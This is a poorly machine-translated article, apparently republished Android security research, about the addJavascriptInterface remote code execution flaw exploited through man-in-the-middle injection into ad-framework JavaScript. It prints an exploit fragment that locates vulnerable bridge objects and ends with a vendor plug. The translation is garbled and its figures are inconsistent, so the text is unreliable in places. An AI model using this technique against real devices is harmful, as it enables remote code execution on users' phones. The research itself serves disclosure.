"You go into a coffee shop and sit down." When you wait for coffee, you take out your smartphone and start playing a game that you downloaded some days ago. Then, you continue to work and collect mail in the elevator. Without your knowledge, an attacker gets the address of the corporate network and constantly infects all of your colleagues ' smartphones. Although the privilege elevation techniqueAndroid(and the Convention of "Root" devices), remote code execution is a rare and much more dangerous vulnerability. It allows an attacker to execute specific code on the user's device without authorization. This bug is especially interesting because, even after it has been repaired for 18 months, it can still be exploited on the latest Android device with all the patches installed. before you begin the details, learn the background of this bug:
Background Knowledgeit started in 2012 with JavaScript in the Addjavascriptinterface API for remote code execution bug,cve-2012-6636. This bug allows JavaScript code to gain greater access to the system, which is not what the developer intended. So bad at this point. A few months later, MWR's researchers showed that a large number of apps used the ad vendor's framework programs, which were often affected by the bug and downloaded JavaScript code while it was running.
not fixed yet? Android 4.2 Fixes this potential JavaScript vulnerability. Unfortunately, because of backwards compatibility, remediation only means that the vulnerability is closed in a particular scenario. The reality of the Android version fragmentation and the advertising business model on Android means that these scenarios are not common. We checked the 100,000 APK files on Google Play and found that about 12% were still at risk even though running on the latest Android devices. APK Analysis results: Half of the vulnerability risk, because their target SDK version is greater than or equal to 17, the remaining 31% is not using the vulnerability of api;7% due to apk confusion or analysis error without analysis. In addition, more than 50% of Android devices still use versions below 4.2, regardless of whether the vulnerability is fixed. For these devices, there is no fix, and they still risk the vulnerability.
Technical Pointsto fix the success, the program calling Addjavascriptinterface must be compiled to API 17 and above, meaning that your target Android version must be 4.2 and later. To be compatible with more devices, apps and framework programs are often compiled with the lowest possible API version. The point is that even if you run a patch on Android 4.2, 4.3 or 4.4, the app still has the risk of a vulnerability attack. The advertising business model is popular in Android: The app is free, and developers earn revenue by showing ads to users. In Android, there are more than 50 different ad framework programs, which makes it easy for developers to implement ad functions, and in fact they often use more than one AD framework program in the app. There are 20 of apps found using more than one. Most of these framework programs have this behavior-they download JavaScript libraries over HTTP when the app first runs. This means that the app is often unsafe to download unauthenticated JavaScript code that runs in an environment that can execute arbitrary code.
code execution means unrestricted access to the deviceso far, the vulnerability has only allowed an attacker to execute code in an Android application environment. This is bad, but it is still restricted by the Android privilege system to access the data in a separate application. However, once an attacker has a foothold in the system, this is similar to the additional privileges they might gain. Taking the Futex vulnerability as an example, it affects every version of the Linux kernel currently in use, including the Android system and the Galaxy S5, the first successful root. Although they are not equivalent, we should develop the habit of "Remote Code Execution" and "root privilege" on a severity level, because sooner or later a determined hacker will be able to jump from one place to another and gain full control of the device.
Exploit in the real worldwe randomly downloaded 102,189 free playstore from theapp, and the statistical analysis found that 12.8% of them have potential vulnerability risks. These apk also use the too low target API version and the Addjavascriptinterface API. The vulnerabilities of these apk calls to Addjavascriptinterface can in fact be exploited in the form of a man-in-the-middle attack, which can be initiated when JavaScript scripts are downloaded from the Internet insecure.
Test your app's vulnerabilities we have set up a WiFi wireless access point (AP) that acts as a transparent Web Proxy man-in-the-middle. It is set to inject malicious code into any device that accesses this AP when it requests any script over HTTP. The AP sets a password in case someone is misused, but this method can be used for publicly accessible APS. Even when the AP is not controlled, techniques such as DNS poisoning or ARP cache spoofing can also be used to implement a broker-in-the-middle. Or you can install a fake AP that mimics a legitimate AP. In other words, there are various ways to implement a man-in-the-middle agent, and anyone using WiFi will access the network through our agents. The dynamic nature of JavaScript means that we do not need to detect a particular application or AD framework program as a target. When run, malicious code scans the entire JavaScript namespace for objects, looks for objects that use ADDJAVASCRIPTINTERFACEAPI incorrectly, and then tests each for vulnerabilities. If the vulnerability is not found, it silently exits without affecting the operation of the app. If it succeeds, it will run a shell command to launch the calculator app. injected JavaScript fragment
<font face= "Arial" size= "3" color= "#000000" >function Findvulnerableobject () {
For (var prop in window) {
try {
If getclass () doesn ' t throw, the object is vulnerable
Window[prop].getclass ();
return Window[prop];
}
catch (Err) {}
}
return null;
}</font>
after I set up the AP, I randomly selected some of the 13,119 apps labeled as potentially vulnerable, installing them to a NEXUS5 (running 4.4.3) and a Samsung XE700T (the x86 tablet running AOSP 4.2) connected to the AP. By launching each app and doing simple interactions, remote code execution has been successfully triggered in more than half of the applications, and they have loaded malicious code injected through a man-in-the-middle agent.
It's all advertising .by looking at the trajectory of the TCP/IP package, it was soon discovered that the AD framework program was the culprit for federated use of Addjavascriptinterface and unsecured HTTP downloads. None of the framework programs we investigate use HTTPS, which means that any app that uses these framework programs is also vulnerable to downloading JavaScript in an unsecured manner. Previous research has shown that 17% of apps use HTTPS, but are not used properly. Check out some apps to see which ad frameworks are used. AdMob is the most used, but we find that a lot of the frameworks used are still unsafe to use addjavascriptinterface. More than 80% of non-paid apps include at least one ad frame in the app you're checking. Overall, there are 4,190 ad frames in the 2,140 apps identified.
How serious is the problem? Google posted an approximate amount of downloads for all apps on Playstore. There are more than 150 million downloads for the only small number of use cases that we manually identified as being vulnerable. This is not to say that there will be 150,000,000 vulnerable devices, as one device may install several different vulnerable applications. But given the potential risk of the--10% app we found in the analysis, 50% of risky apps are being tested on the ground-and there are a lot of vulnerable devices. Also, don't forget that 57% of Android devices are running on versions below 4.2. So even if tomorrow all the vulnerable apps and frameworks are patched on a 4.2 patch, more than half of Android devices will not be able to fix the vulnerability. Once you've implemented remote code execution, it's not much of a leap forward in the disaster scenario described in the coffee shop before the end. Initializing a matching root permission, a compromised device becomes some sort of middleman, which then goes into any network. Therefore, the attack begins to propagate.
data for the Merge Device Analyzer (analyser)Device Analyser is another source for counting Android devices. One of the features is that it tracks how frequently users start different applications. To cross-reference the data on the list of potential defect applications, the following results are given:
average number of potential defect apps per user open per dayThe Device Analyzer's data shows that the device's users open an average of 0.4-0.5 potential vulnerabilities per day. The average number of times a week has received (a vulnerability) attack. We cannot assume that the version of the app is newer than the one we have analyzed, so when our sample data is no longer the latest version, the corresponding graph also shows a sharp drop. If we re-performed our analysis of the latest APK version, we would probably see it still at 0.4 points. DA's data is a fairly small sample that allows it to guide more of the conclusions about Android devices, which is generally difficult. by using a relatively simple man-in-the-middle proxy technology, there is no need for a specific application or device to remotely run a compromised application, even if the Android device has a full patch installed. Using static analysis we found that a significant percentage of applications are likely to remain fragile, and we have confirmed that more than half of the applications that have been randomized tested are indeed less resistant. Androidapp Existing loopholes, is the first goal of hackers, so in time to use vulnerability detection toolsSafe.ijiamito detect, and according to the vulnerability of the corresponding repair or protection, the use of Android app security platformIjiamiencrypt the app to protect your personal interests!
How hackers are remotely compromised by your Android phone